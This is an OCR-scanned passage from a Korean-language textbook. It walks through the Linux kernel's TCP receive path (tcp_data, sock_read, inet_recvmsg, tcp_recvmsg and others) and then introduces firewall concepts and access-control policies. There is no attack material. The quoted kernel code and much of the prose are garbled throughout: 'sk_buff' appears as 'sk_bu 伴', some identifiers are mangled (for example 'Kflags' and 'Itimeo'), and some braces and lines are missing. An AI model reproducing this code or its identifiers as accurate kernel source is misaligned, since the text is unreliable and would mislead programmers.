트에 대한 처리를 하거나 혹은 child INET 소케트의 backlog 에 sk_bu 伴를 추가하는 역할 
을 수행 한다 (tcp_rcv_state_pi*ocess() 를 child INET 소케트에 대 해서 호출함 ) . 

모든 상황에 대한 처 리를 완료하였을 때 지역 (local) 호스트에 해당한 INET 소케트가 없 
다면 상대방의 호스트로 RESET 통보를 보낸다 (tcp_v4_send_reset()). 

② sk_bu 伴를 버 리 고 복귀 하는 부분이 다 . 검 사합오유에 해 당한 오유 account 정 보를 갱 
신한다 . 



우리 가 고찰하는 경 우는 소케 _E •가 이 미 


련결상태 로 되 여 있는 상태 이 기 때 문에 
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tcp_rcv_establish() 함수가 선택된다 . 이 함수는 〜/ net/ipv4/tcp_input.c 에 정의되여 있다 . 
이 함수는 확인응답에 대한 처리와 상위규약층에 파케트가 도착했음을 알리는 역할을 수 
행 한다 . 여 기서 사용되 는 함수에 는 tcp_data() 함수와 INET 소케 트의 data_ready() 함수 
가 있 다 . 어 떤 함수를 사용하는가는 파케 트를 받아서 사용하게 될 프로쎄 스가 현행프로쎄 
스인가 아닌가에 의존된다 . 만일 현행프로쎄스라면 INET 소케트의 data_ready() 함수가 호 
출되 며 그렇 지 않다면 tcp_data() 함수가 호출된 다 . 일 반적 으로 현 행프로쎄 스가 아닌 경 우 
가 더 많기때문에 tcp_data() 함수를 고찰하자 . 

이 함수는 ~/net/ipv4/tcp_input.c 에 정의 되 여 있다 . 


코드 42. tcp_data() 함수 

static void tcp_data(struct sk_bu 伴 * skb, struct sock *sk, unsigned int len) 

{ 

struct tcphdr *th; 

struct tcp_opt *tp = & (sk->tp_pinfo.af_tcp )； 
th = skb- 〉 h.th; 
skb_pull(skb, th->doff*4 )； 
skb_trim(skb, len - (th->doff*4 ))； 
if (skb ->len == 0 && !th->fin) 
goto drop ； 

TCP_ECN_accept_cwr(tp, skb )； 
if (atomic_read(&sk->rmem_alloc) > sk->rcvbuf | | 
!tcp_rmem_schedule(sk, skb)) { 

if (tcp_prune_queue(sk) < 0 | | !tcp_rmem_schedule(sk ? skb)) 
goto drop ； 

} 

tcp_data_queue(sk, skb); 

#ifdefTCP_DEBUG 

if (before(tp - 〉 rcv_nxt, tp ->copied_seq)) { 

printk(KERN_DEBUG tcp.c*tcp_data bug acked < copied\n n ); 
tp- 〉 rcv_nxt = tp ->copied_seq ； 

} 

#endif 

return ； 

drop: 

— kfree_skb(skb) ； 


이 함수의 역할은 파케트자료에 대한 처리 이다 . 먼저 sk_bu 伴에 들어 있는 TCP 머리부 
정보와 INET 소케트에 들어있는 TCP 옵션에 대한 정보를 획득하고 여기서 필요없는 머리 
부정보를 없애며 길이가 정확한가를 확인한다 . 만약 수신을 위한 완충기의 크기추 i 당하 
지 못하다면 수신한 sk_bu 伴를 버린다 (drop). 적당하다고 생각되면 tcp_data_q$Ii/TT 법 " 
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수를 호출하여 수신한 sk_bu 伴의 소유자를 INET 소케트로 바꾸고 INET 소케트의 수신대 
기렬의 마지막에 sk_bu 伴를 추가하며 다시 INET 소케트의 data_ready () 함수를 호출한다 . 

— INET 소케트층 

앞에서 이미 INET 소케트층의 data_ready () 함수를 호출한다고 언급했다 . 여기서부터 
는 INET 소케트층에서 제공하는 함수가 된다 . INET 소케트층의 data_ready () 함수는 사용 
되는 주소계렬 (Address Family ) 마다 다른 형식을 취하고있는데 여기서는 INET 에 대한 
것으로 한정되기때문에 〜 /net/core/sock.c 파일의 sock_init_data () 함수내에서 아래와 같 
이 정의된다 . 

sk- > data_r eady = sock_def_readable ； 

sock_def_readable() 함수를 보면 아래와 같다 . 이 함수는 ~/net/core/sock.c 에 정의 
되 여 있 다 . 


코드 43. sock_def_readable 0 함수 

void sock_def_readable (struct sock *sk，int len) 

{ 

read_lock (&sk->callback_lock) ； 
if (sk~>sleep && waitqueue_active (sk->sleep)) 
wake_up_interruptible (sk->sleep) ； 
sk_wake_async (sk, 1, POLL_IN) ； 
read_unlock ( & sk->callback_lock) ； 


이 함수의 역 할은 INET 소케 트의 sleep 대 기 렬 에서 자고있는 프로쎄 스들을 깨 우는것 이 
다 . 즉 수신대 기 상태 에 있 는 프로쎄 스가 있 다면 그것 들을 전부 깨 워준다 . 만일 프로쎄 스 
가 읽기를 요구한다면 BSD 소케트에 대해서 readO 함수를 호출하며 이것은 다시 sys_read() 
체 계 호출함수， sock_read() 함수， inet_rcvmsg() 함수， tcp_rcvmsg() 함수의 순서 로 호출하 
게 된다 . 완충기 가 비 여있고 프로쎄스가 blocking 방식을 사용하고있다면 INET 소케 트의 
sleep 대기렬에서 잠들게 된다 . 프로쎄스는 요구하는 자료가 도착하면 다시 깨 여나게 되며 
그 다음부터 INET 소케트의 수신대 기렬에 들어있는 sk_bu 伴자료들을 처 리하게 된다 . 
sys_read() 함수는 시 fs/read_write. c 에 정 의 되 여 있 다 . 
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코스 

E. 44. 

sys_read() 함수 


asmlinkage ssize_t sys_read (unsigned int fd, char * buf, size_t count) 


ssize_ 

t ret ； 



struct file * file ； 



ret = 

-EBADF ； 



file = 

fget(fd )； 



if (file) { 



if 

(file- 〉 f_mode & FMODE_READ) { 
ret = locks_verify_area (FLOCK_VERIFY_READ, 




file - >f_dentry->d_inode, file, file->f_pos, count) ； 



if (! ret) { 




ssize_t Oread) (struct file *，char * ， size_t, 
ret = -EINVAL ； 

loff_t *) ； 



if (file~>f_op && (read = file - >f_op->read) ! 
ret = read (file, buf, count, &file _〉f pos) ； 

} ᅭ 

!= NULL) 


} 

if 

(ret > 0) 




inode_dir_notify (file - >f_dentry->d_parent->d_inode, DN_ACCESS) ； 



fput (file) ； 


} 

return ret; 



sys_read() 함수는 파일서술자와 사용자자료완충기，그리고 완충기의 크기를 나타내 
는 값을 넘 겨 받는다 . 파일서술자로부터 해 당한 파일객체를 찾고 이것 을 리용해서 파일연 
산자의 readO 함수를 호출한다 . 해당한 파일객체를 찾을 때 BSD 소케트에 해당하는 파일 
연산자를 찾는다 . 따라서 readO 함수는 sock_read () 에 해당된다 . 

一 BSD 소케트층 

sock_read() 함수는 BSD 소케트층에 해 당하는 파일객체의 파일 연산자로 주어진다 . 

이 함수는 ~ /net / socket.c 에 정의되 여있다 . 


코드 45. sock_read () 함수 

static ssize_t sock_read (struct file *file, char *ubuf, 
size_t size, loff_t *ppos) 

{ 

struct socket *sock ； 
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struct iovec iov ； 
struct msghdr msg; 
int flags ； 

if (ppos 卜 &file - >f_pos) 
return -ESPIPE ； 

if (size==0) /* Match SYS5 behaviour */ 
return 0; 

sock = socki_lookup (file - >f_dentry->d_inode) ； 

msg. msg_name=NULL ； 

msg. msg_namelen=0 ； 

msg. msg_iov=&iov ； 

msg. msg_iovlen=l ； 

msg. msg_control=NULL ； 

msg. msg_controllen=0 ； 

iov. iov_base=ubuf ； 

iov. iov_len=size; 

flags = ! (file - >f_flags & O.NONBLOCK) ? 0 : MSG_DONTWAIT ； 
return sock_recvmsg(sock, &msg, size, flags) ； 


sock_read() 함수는 파일객체지 적 자와 사용자완중기지 적 자，완중기 의 크기 와 현재 연 
산위치를 넘겨받는다. 여기서는 통보구조체를 생성하고 파일객체의 등록부마당 (field) 의 
d_inode 에 해당한 BSD 소케트를 얻는다. 이것을 리용하여 다시 BSD 소케트층의 
sock_i*ecvmsg() 함수를 호출한다. 


코드 46. sock _ recvmsg () 함수 

int sock_recvmsg(struct socket *sock，struct msghdr *msg，int size, int flags) 

{ 

struct scm_cookie scm ； 
memset(&scm, 0, sizeof(scm)) ； 

size = sock->ops->recvmsg(sock, msg, size, flags, &scm) ； 
if (size >= 0) 

scm_recv(sock, msg, &scm, flags) ； 
return size ； 


sock_recvmsg() 함수는 다시 BSD 소케 트의 규약연산구조체 인 recvmsgO 함수를 호출 
하고 넘 겨 받은 값이 0 이 상이 면 scm_recv() 함수를 호출하여 소케 트조종을 처 리한다. 이 때 
반환값으로는 받은 자료의 크기가 된다. 여기서는 INET 규약에 대해서 론의하고있기때문 
에 앞에서 언급한 INET 소케트층의 연산구조체의 inet_recvmsg() 함수가 호출된다. 이 함 
y^net/ipv4 / af_inet. c 에 정 의 되 여 있 다. 
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코드 47. inet_recvmsg () 함수 

int inet_recvmsg(struct socket *sock, struct msghdr *msg, int size, 
int flags, struct scm_cookie *scm) 

{ 

struct sock *sk = sock_ 〉 sk; 
int addr_len = 0 ； 
int err ； 

err = sk->prot->recvmsg(sk, msg, size, flags&MSG_DONTWAIT, 
flags&-MSG_DONTWAIT, &addr_ len); 
if (err 〉= 0) 

msg- 〉 msg_namelen = addr_len ； 
return err ； 


inet_recvmsg() 함수는 다시 BSD 소케트로부터 INET 소케트구조체를 찾아내고 INET 
소케 트구조체 로부터 해 당한 규약의 recvmsgO 함수를 호출한다 . 넘 겨 주는것 은 recvmsgO 
를 호출한 반환값이다 . INET 소케트의 prot 마당은 아래층의 통신규약에서 제공하는 연산 
구조체 이 다 . TCP 에 한정 시 킨다면 tcp_recvmsg() 함수가 호출된다 . 

이 함수는 ~/net/ipv4/tcp.c 에 정의되 여 있다 . 


코드 48. tcp_recvmsg() 함수 

int tcp_recvmsg(struct sock *sk, struct msghdr *msg, 

int len, int nonblock, int flags, int *addr_len) 

{ 

struct tcp_opt *tp = & (sk- >tp_pinfo. af_tcp) ； 
int copied = 0; 
u32 peek_seq ； 
u32 *seq ； 

unsigned long used ； 
int err ； 

int target ； I* Read at least this many bytes */ 
long timeo; 

struct task_struct *user_recv = NULL ； 

// . ® 

lock_sock(sk )； 

TCP_CHECK_TIMER(sk )； 
err = -ENOTCONN ； 
if (sk->state == TCP_LISTEN) 
goto out ； 

timeo = sock_rcvtimeo(sk, nonblock )； 

/* Urgent data needs to be handled specially. */ 
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if (flags & MSG_OOB) 
goto recv_urg ； 
seq = &tp->copied_seq ； 
if (flags & MSG_PEEK) { 
peek_seq = tp ->copied_seq ； 
seq = &peek_seq ； 

} 

target = sock_rcvlowat(sk，flags & MSG_WAITALL ? len )； 

//. (D 

do { 

struct sk_bu 伴 * skb ； 
u32 o 伴 set; 

/* Are we at urgent data? Stop if we have read anything. */ 
if (copied && tp ->urg_data && tp ->urg_seq == *seq) 
break ； 

/* We need to check signals first, to get correct SIGURG 

* handling. FIXME: Need to check this doesnt impact 1003.lg 

* and move it down to the bottom of the loop 
*/ 

if (signal_pending(current)) { 
if (copied) 
break ； 

copied = timeo ? sock_intr_errno(timeo) : -EAGAIN ； 
break ； 


/* Next get a buffer. */ 

skb = skb_peek(&sk->receive_queue )； 

//.(3) 

do { 

if (!skb) 
break ； 

/* Now that we have two receive queues this 
* shouldn’t happen. 

*/ 

if (before(*seq, TCP_SKB_CB(skb)->seq)) { 

printk(KERN_INFO M recvmsg bug: copied %X seq %X\n n , 
*seq, TCP_SKB_CB(skb)->seq )； 
break ； 

} 

offset = *seq - TCP_SKB_CB(skb)->seq ； 

if (skb ■ >h. th- > syn) 
offset --； 

if (o 伴 set < skb ->len) 
goto found_ok_skb ； 

if (skb->h.th->fin) 
goto found_fin_ok ； 
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if (Kflags & MSG_PEEK)) 
skb->used = 1 ； 
skb = skb- 〉 next; 

} while (skb != (struct sk_bu 伴 *) &sk - 〉 receive_queue); 

//. ® 

/* Well, if we have backlog, try to process it now yet. */ 
if (copied 〉= target && sk->backlog.tail == NULL) 
break ； 
if (copied) { 

if (sk->err | | s k->state = TCP.CLOSE | | 

(sk->shutdown & RCV_SHUTDOWN) | | Itimeo) 
break ； 

} else { 

if (sk->done) 
break ； 
if (sk->err) { 

copied = sock_error(sk )； 
break ； 

} 

if (sk->shutdown & RCV.SHUTDOWN) 
break ； 

if (sk->state == TCP_CLOSE) { 
if (!sk->done) { 

/* This occurs when user tries to read 
* from never connected socket. 

copied = -ENOTCONN ； 
break ； 

} 

break ； 

} 

if (Itimeo) { 

copied = -E AG AIN ； 
break ； 


⑤ 


cleanup_rbuf(sk, copied )； 

// 

if (tp->ucopy.task == user_recv) { 

/* Install new reader */ 

if (user_recv == NULL && !(flags&(MSG_TRUNC | MSG_PEEK))) { 
user_recv = current ； 
tp->ucopy.task = user_recv ； 
tp->ucopy.iov = msg->msg_iov ； 

} ᄄ 
tp->ucopy.len = len ； 


회 
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BUG_TRAP(tp ->copied_ _seq -= tp_ 〉 rcv_nxt | | 
(flags&(MSG_PEEK | MSG_TRUNC )))； 
if (skb_queue_len(&tp ->ucopy.prequeue)) 
goto do_prequeue ； 

/* — Set realtime policy in scheduler — */ 

} 

if (copied 〉= target) { 

/* Do not sleep, just process backlog. */ 

release_sock(sk) ； 

lock_sock(sk); 

} else { 

timeo = tcp_data_wait(sk, timeo )； 


if (user_recv) { 
int chunk ； 

/* — Restore normal policy in scheduler — */ 
if ((chunk = len - tp->ucopy.len) != 0) { 

net_statistics[smp_processor_idO*2+l].TCPDirectCopyFromBacklog += chunk ； 
len -= chunk ； 
copied += chunk ； 

} 

if (tp->rcv_nxt == tp ->copied_seq && skb_queue_len(&tp ->ucopy.prequeue)) 


do_prequeue- 


tcp_prequeue_process(sk )； 

if ((chunk = len - tp->ucopy.len) != 0) { 

net_statistics[smp_processor_id()*2+l].TCPDirectCopyFromPrequeue 
+= chunk ； 
len -= chunk ； 
copied += chunk ； 


continue ； 


found_ok_skb: 

/* Ok so how much can we use? */ 
used = skb ->len - offset ； 
if (len < used) 
used = len ； 

/* Do we have urgent data here? */ 
if (tp->urg_data) { 

u32 urg_offset = tp ->urg_seq - *seq; 
if (urg_offset < used) { 
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if (!sk->urginline) { 
++*seq ； 
offset ++； 
used --； 

} 

} else 

used = urg_o 伴 set; 


//. ® 

err = 0 ； 

if (!(flags&MSG_TRUNC)) { 

err = memcpy_toiovec(msg->msg_iov, ((unsigned char *)skb - 〉 h.th) + 
skb->h.th->doff*4 + offset, used )； 
if (err) { 

/* Exception. Bailout! */ 
if (Icopied) 

copied = -EFAULT ； 
break ； 


*seq += used ； 
copied += used ； 
len -= used ； 

if (after(tp->copied_seq,tp->urg_seq)) { 
tp->urg_data = 0; 

if (skb_queue_len(&tp ->out_of_order_queue) == 0 

#ifdef TCP_FORMAL_WINDOW && tcp_receive_window(tp) 
#endif 
){ 

tcp_fast_path_on(tp )； 

} 

} 

if (used + offset < skb ->len) 
continue ； 

/* Process the FIN. We may also need to handle PSH 
* here and make it break out of MSG_WAITALL. 

if (skb->h.th->fin) 
goto found_fin_ok ； 
if (flags & MSG.PEEK) 
continue ； 
skb->used = 1 ； 
tcp_eat_skb(sk, skb )； 
continue ； 

// . © 
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found_fin_ok- 

++*seq; 

if (flags & MSG_PEEK) 
break ； 

/* All is done. */ 
skb->used = 1 ； 
break ； 

} while (len > 0); 

//. ® 

if (user_recv) { 

if (skb_queue_len(&tp ->ucopy.prequeue)) { 
int chunk ； 

tp->ucopy.len = copied > 0 ? len : 0; 
tcp_prequeue_process(sk) ； 

if (copied > 0 && (chunk = len - tp->ucopy.len) != 0) { 

net_statistics[smp_processor_id()*2+l].TCPDirectCopyFromPrequeue 
+= chunk ； 
len -= chunk ； 
copied += chunk ； 

} 

} 

tp->ucopy.task = NULL ； 
tp->ucopy.len = 0 ； 

} 

/* Clean up data we have read- This will do ACK frames. */ 
cleanup_rbuf(sk, copied )； 

TCP_CHECK_TIMER(sk )； 
release_sock(sk )； 
return copied ； 
out: 

TCP_CHECK_TIMER(sk )； 
release_sock(sk )； 
return err ； 
recv_urg: 

err = tcp_recv_urg(sk, timeo, msg ， len, flags, addr_len )； 
goto out ； 

} 니 

II ⑪ 


tcp _ i * ecvmsg () 함수를 고찰하자. 

① tcp _ recvmsg () 함수는 BSD 소케 트구조체 와 통보머 리 부， 완충기 의 크기， 
non - blocking 기발，기타 기발값들과 주소의 길이를 넘겨받는다. BSD 소케트구조체로부터 
TCP 에 해당하는 옵션을 사용할 국부변수를 할당한다. 



수의 기본부분으로 들어 가기 에 앞서 해주어 야 할 부분은 먼저 사용하는 BSD 소 
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케 트구조체 에 lock 를 설 정 하는것 이 다 (lock_sock () ) . 

BSD 소케 트가 현재 LISTEN 상태 라면 out 로 넘 어 간다 . 수신 timeout 에 사용할 값을 설 
정 한 다음 넘 겨 받는 flag 값이 Out-Of-Band 로 설정 되 여 있 다면 recv_urg 로 넘 어 간다 . TCP 
의 옵션마당에서 sequence 번호를 구하고 다시 flag 가 MSG_PEEK 로 설정된 경우에는 TCP 
의 옵션마당의 copied_seq 로부터 선택 (peek) 할 sequence 번호를 얻는다 . 그리고 얼마만큼 
의 값을 읽 겠는가를 설정 한다 . (sock_i*cvlowat()) 

③ 여 기서부터는 무한순환을 돌면서 자료를 읽어들이는 부분이 다 . 먼저 여 기서 사용 
할 sk_bu 伴구조체변수를 선 언 하고 현재 의 읽 기변위값을 나타내 는 변수를 선 언 한다 . 

만일 긴급한 자료 (urgent data) 를 가지고있다면 즉시 무한순환을 끝낸다 . 그리고 현 
재 프로쎄스에 대 해서 미결된 (pending) 신호가 있는가를 확인하고 그런 신호가 존재 하고 
복사된 자료가 있다면 오유값을 반환하고 순환고리 에서 빠져 나온다 . 

이제부터는 BSD 소케트에 대기 된 (queueing) sk_buff 에 대한 처리에 들어 간다 
(skb_peek()). 

skb_peek() 함수는 inline 으로 정의되 여 있으며 대 기 렬로부터 소케트완충기 (sk_bu 伴 ) 
를 하나씩 꺼 내 오는 역 할을 한다 . 

④ 더 이 상 가져 올 sk_buff 가 없 다면 순환고리 에 서 빠져 나간다 . 소케 트완충기 (sk_bu 伴 ) 
의 TCP 머 리 부로부터 sequence 번 호를 가져 와서 변위 값을 계 산한 다음 SYN 을 나타내 는 경 
우에 는 변위값을 1 만큼 감소시키 고 변위값이 sk_bu 伴의 길 이 보다 작을 경 우에 는 
foimd_ok_skb 로 넘어 간다 . 만약 TCP 머 리부에 FIN 이 설정된 경 우에 는 다시 found_fin_ok 
로 넘어 가게 되며 MSG_PEEK 가 flag 로 설정되지 않았다면 sk_bu 伴를 사용하였다 (used) 
고 설정한다 . 이 순환은 BSD 소케트의 수신대기렬이 다 채워질 때까지 계속된다 . 

⑤ 이 미 복사된것(수신한 자료의 복사)이 목표값을 넘어서거 나 다시 BSD 소케 트의 
backlog 가 NULL 일 경 우에 는 순환고리 에 서 빠져 나온다 . 일 정 하게 복사가 되 였 다면 소케 
트의 상태를 확인하고 TCP_CLOSE 상태를 나타내거나 오유가 발생했을 경우，그리고 
shutdown 되거나 timeout 이 발생했다면 다시 순환고리에서 빠져나온다 . 복사된것 이 없는 
경우에는 BSD 소케트의 상태를 확인하여 오유나 혹은 앞에서와 비슷한 상황들에 대해서 처 
리 를 해 준다 . cleanup_rbuf() 함수는 sk_bu 伴를 해 제 (release) 하고 필 요할 경 우 ACK 통보 
를 보내는 역 할을 한다 . 

⑥ 사용자주소공간으로 복사하기를 원하는 프로쎄스가 user_recv (초기 에 NULL 로 설 
정)와 같고 user_recv 가 NULL 이며 flag 에 MSG_TRUNC 와 MSG_PEEK 이 설정되지 않 
은 경 우에 는 user_recv 와 TCP 옵션의 ucopy.task 를 현행 (current) 프로쎄 스로 만들며 통 
보 iovec 를 리용하여 TCP 옵션마당의 ucopy.iov 를 설정한다 . 현재 복사된 크기 를 len 으로 
설정하고 prequeue 에 sk_bu 伴가 들어있는가를 확인한다 . 

만약 복사된 크기 (copied) 가 target 보다 크거 나 같다면 소케 트를 해 방한 
소케 트의 대 기 중인 프로쎄 스들을 깨우고 (release_sock()) 다시 BSD 소케 트에 1 
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시도한다 . 만일 복사된 량이 target 량보다 작은 경우에는 tcp_data_wait () 함수를 BSD 
소케 트에 대 해 서 timeout 값을 넘 겨 주어 호출한다 . 

tcp_data_wait() 함수는 BSD 소케 트의 sleep 마당에 현재 프로쎄 스를 넣 고 현재 프로쎄 
스를 TASK_INTERRUPTIBLE 로 만든다 . 프로쎄 스는 이 상태 에 서 잠들게 된 다 . 

⑦ 만약 user_recv 마당이 NULL 이 아니 라면 망통계정보를 갱 신하고 복사된 자료의 량 
을 갱신한다 . 이때 TCP 의 다음번에 받을 sequence 번호가 복사된 sequence 번호와 같고 
prequeue 된 값이 있을 때 tcp_prequeue_process () 호출하여 prequeue 된 sk_buff 를 처 
리한다 . 물론 이 와 관련된 망통계정 보와 복사정 보는 이 에 따라서 갱 신된다 . 이제 는 다음 
번 순환으로 들어간다 . 

⑧ 완충기의 길이가 변위값보다 큰 소케트완충기를 찾은 경우다 . 변위값을 소케트완 
충기에서 추출하여 used 마당으로 놓은 다음 이것을 다시 남은 길이 (len ) 와 비교한다 . 남 
은 길이 (len) 가 작다면 이것을 used 에 설정 한다 . 만약 긴급자료가 있다면 urgent sequence 
번호에서 현재 sequence 번호를 던 다음 긴급자료의 변위값으로 사용한다 . 다시 이것 이 used 
보다 작고 어 떤 값을 가진다면 used 를 긴급자료의 o 伴 set 를 used 에 설정한다 . 

⑨ found_ok_skb () 함수의 계속이다 . flag 에 MSG_TRUNC 가 설정되지 않았다면 통 
보머리부에 소케트완충기의 used 만큼의 내용을 머리부를 제외하고 복사해넣는 
다 . (memcpy_toiovec()) 만일 오유가 있다면 이것을 표시하고 do {} while loop 를 끝낸다 . 

그리고 sequence 와 복사된 자료의 량을 가르키는 정보의 갱신과 아직 더 남은 자료 
가 있는지 확인하여 순환고리 를 더 돈다 . 만일 FIN 을 받았다면 found_fin_ok 로 넘 어 가고 
소케 트완충기 는 사용되 였 다고 표시 되 며 (skb - 〉used = 1) ， BSD 소케 트에 서 사용된 sk_bu 伴 
를 추출한다 (tcp_eat_skb ()). 모든 과정 이 끝났다면 다시 순환고리 를 돈다 . 

⑩ FIN 이 설 정 된 TCP 머 리 부를 가지 는 sk_bu 伴를 수신한 경 우이 다 (found_fin_ok). 
sequence 를 증가시 키 고 flag 에 MSG_PEEK 가 설정된 경 우에 는 순환고리 를 빠져 나온다 . 그 
렇 지 않다면 sk_buff 가 사용되 였 다고 표시 한후 순황고리 에 서 빠져 나온다 . 요구한 자료의 량 
(len) 이 0 보다 클때 는 계 속 순환한다 . 

⑪ 만일 useirecv (사용자 receive 프로쎄 스 ) 가 NULL 이 아니 라면 prequeue 를 보고 이 
것을 처리해주게 되며 해당한 망통계정보 및 복사된 량과 남은 요구자료의 량을 갱신한다 . 
그리고 TCP 옵션마당의 ucopy.task 를 NULL 로 만들고 ucopy.len 을 0 으로 다시 초기화한 
다 . 이 와 같은 일 이 끝나면 소케 트완충기 (sk_bu 伴)를 해 제 하고 (cleamip_rbuf) BSD 소케 
트의 TCP 와 관련된 timei •를 검사하고 BSD 소케 트에 대 한 lock 를 해제한 후 복사된 량을 
돌려주고 복귀한다 . 긴급자료를 받은 경 우에 는 tcp_recv_urg() 함수를 호출한다 . 

이상에서 LINUX 에서의 TCP/IP 규약에 기초한 망흐름구조에 대해서 고찰하였다 . 

LINUX 에서의 망흐름과정을 종합하여 보면 그림 3-3 과 같다 . 
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제2절. 방화벽체계 

방화벽체계는 필수적 인 인터네 트봉사를 제 공하는것과 함께 기관내 망보안을 강화할수 
있는 망보안의 중요한 구성요소이다 . 물론 방화벽체계를 실현하는것이 망보안의 충분한 보 
장을 해준다고는 볼수 없지만 효과적 이고 비용이 비교적 적게 드는 방법 이라고 볼수 있다 . 
여 기서는 보안취 약성 으로부터 호스트를 어떻게 보호하는가와 방화벽의 구성요소를 포함한 
방화벽의 대략적인 내용과 관리적측면에서 알아야 할 문제들에 대해서 서술한다 . 

또한 LINUX 에서 제공된 방화벽의 기본방식과 구체적 인 자료구조 및 기능에 대해서 상 
세히 서 술한다 . 



그림 3-4. 방화벽 


3.2.1. 방화벽의 개념 

방화벽은 원래 자동차분야에서 쓰이던 용어였다 . 방화벽은 자동차기관과 승객사이의 차 
폐막의 역 할을 해주는 장치를 가리 킨다 . 자동차기관에서 화재가 일어나도 승객을 보호하 
기 위해서 제기된 개념이다 . 이 용어가 그대로 콤퓨터망과 관련된 의미를 가지게 되였는 
데 여기서 방화벽이란 국부적인 망구조를 인터네트와 같은 공공의 망으로부터 보호하는 장 
치를 통털어 말한다.흔히 방화벽역할을 수행하는 콤퓨터를 방화벽 이라고 부론다 . 방화벽 
은 외부로부터 내부망을 보호하기 위하여 내부망과 인터네트의 경계지점에 관문형태로 실 
현되는 망구성요소중의 하나이 다 . 방화벽 은 외부의 불법 침 입 으로부터 내부의 정 보자원을 보 
호하고 내부로부터 외부로 나가는 비밀자료를 막는 기능을 수행한다 . 

이와 같이 내부망과 인터네트의 련결부분에서 방화벽 이 차단하고있으므로 내부망에서 
인 터 네 트를 사용하자면 우선 telnet 로 가입 등록한 후 인 터 네 트를 사용하여 야 한다 . 
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그림 3-5. 방화벽의 위치 


1) 방화벽의 보안방책의 개념 

내 부자원을 보호하기 위한 방책 은 크게 다음의 두가지 로 요약할수 있다 . 

① 명백히 금지되지 않은것은 허용한다 . 

② 명백 히 허용되지 않은것은 금지한다 . 

대부분 방화벽체계는 기본보안개념으로〈〈명백히 허용되지 않은것은 금지한다〉〉의 방 
책을 따른다 . 즉 보안규칙에 명백히 허용 ( 설정)되지 않은 망과 호스트는 내부자원에로의 접 
근을 금지한다 . 

2) 방화벽의 요구사항 

방화벽 체 계 에 적 용되 여 야 할 중요한 요구사항은 방화벽 의 관리 자가 체 계 를 운영 하기 쉽 
고 보안방책의 수정이나 변경이 편리하도록 만드는것이다 . 방화벽체계의 하층구조는 매 제 
품마다 거 의 비 슷하고 제 공하는 기 능들도 서 로의 우점 을 리용하는 쪽으로 발전하고있기 때 
문에 망상의 파케 트를 효과적 으로 분석하여 관리 자나 운영 자가 이 미 적 용된 보안방책 을 효 
과적으로 리용할수 있도륵 하는것 이 보다 중요한 방화벽의 조건이 라고 할수 있다 . 방화벽 
체계가 갖추어야 할 조건들을 보면 다음과 같다 . 

① 일정한 수준이 상의 보안성 이 제 공되 여 야 한다 . 

② 운영상 유연성 이 있어 야 한다 . 

③ 사용자에게 투명성을 제공할수 있어 야 한다 . 

④ 대규모의 망구조에도 적용이 가능하여야 한다 . 
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⑤ 사용자나 관리자가 사용하기에 편리하여야 한다 . 

⑥ 접 근과 관련하여 정 리 된 기 륵정 보를 제 공하여 야 한다 . 

⑦ 다양한 접근조종기능을 지원하여 야 한다 . 

⑧ 망자료흐름의 감시기능이 가능하여 야 한다 . 

⑨ 기록정보를 분류，분석해주는 기능이 있어야 한다 . 

3) 방화벽의 주요기능 

방화벽은 일반적으로 망봉사별로 해 당 봉사를 요구한 호스트 IP 주소와 포구번호사용 
자인증에 기초하여 외부에서의 침 입으로부터 방어를 하게 된다 . 허가된 망사용자에게는 원 
하는 봉사를 제공하면서 허용되지 않은 사용자에게는 봉사를 차단하고 해당 봉사의 허용 또 
는 실패에 대한 기록을 파일로 남긴다 . 

방화벽은 그 목적이 자료흐름을 조종하는것이라는 점에서는 다른 망장치들과 류사하 
다 . 그러 나 다른 망장치 들과 달리 방화벽 은 그 자료파케 트가 무엇 인가를 고려하여 자료흐 
름을 조종하여 야 한다 . 

방화벽 을 설 치하면 다음과 같은 우점 이 있 다 . 

첫째로 불필요하고 불순한 의도를 가전 모든 접근을 차단시킬수 있다 . 방화벽은 IP 
주소와 포구 (Port ) 별로 통제 할수 있으므로 망 전체 에 대 하여 원하는 봉사만 제 한적 으로 외 
부에 대해 허용할수 있다 . 

가령 내 부적 으로 telnet 봉사를 리 용하고있 어 도 외 부에 서 는 telnet 로 접 근을 못하게 할 
수 있 다 . 아니 면 특정한 IP 에 서 의 접 근만 허 용할수도 있 다 . 

둘째 로 내 부의 약점 을 교갑화하여 외부에 공개 하지 않는다 . 내 부적 으로 일부 약점 이 존 
재 하더 라도 외 부에 서 그 약점 을 리용할 방법 을 차단하며 더 나가서 약점 의 존재 그 자체 
를 드러 내지 않는다 . 

례 를 들어 외 부에 서 포구훑기 할 때 방화벽 에 서 차단되 므로 어 떤 약점 이 존재하는지 알 
수 없게 된다 . 

셋째 로 망전체 에 대 한 접 근을 통제하는 일 관된 규칙모임 을 만들수 있 다 . 

방화벽의 주요기능을 보면 다음과 같다 . 

—접근방책설정기능 

정 적 으로 설정된 방화벽 은 망으로 드나드는 자료흐름을 취 급하는데서 일정 한 규칙 에 의 
존한다 . 

접근방책이란 망에서 어떤 형식의 접근이 허용되는가를 서술한 하나의 규칙이다 . 실 
례 로 어떤 내부망을 관리하는데서 다음과 같은 외부망과의 접속제 한을 설정할수 있다 . 

《우리의 내부사용자들은 인터네트웨브싸이트와 FTP 싸이트에 접근할수 있으며 SMTP 


우편을 보낼수 있 다 . 그러 나 우리 는 인 터네 트로부터 우리 내 부망에 로 들어오는 SMTP 우 
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접근방책은 내부망의 각이한 구역들에 적용할수 있다 . 접근방책은 망의 여 러 부분에 
로 드나드는 자료흐름의 방향을 정의한다 . 또한 어떤 형식의 자료흐름이 접수가능하고 
어떤것 이 차단되는가 하는것도 규정 한다 . 접근방책을 정의할 때 많은 각이한 파라메터들 
을 리용하여 자료흐름을 서술할수 있다 . 방화벽을 가지고 실현할수 있는 몇 가지 공통적 인 
접근조종서술자들을 표 3-4 에 보여주었다 . 


표 3-4. 

접근조종항목들 

서술자 

정 의 

방향 (Direction) 

방향에 따르는 허 용가능한 자료흐름의 서 술 . 실례 로 인터네 트로부 
터 내부망에로의 자료흐름 ( 내부로)，또는 내부망으로부터 인터네트 
에로의 자료흐름 ( 외부로 ) 

봉사 

접근되는 봉사기응용프로그람의 형태 . 실례로 웨브 (HTTP), 파일 
전송규약 (FTP), 단순우편전송규약 (SMTP) 

특정 호스트 

때 로 방향만을 규정하는것 이 부족할 때 가 있다 . 실례 로 들어 오는 
HTTP 접 근은 허 용하지 만 하나의 특정 콤퓨터 에 게만은 허 용하지 않 
을수 있 다 . 반대 로 하나의 콤퓨터 에 만 인 터 네 트 웨 브봉사기 접 근을 허 
용할수 있다 . 

개별 사용자 

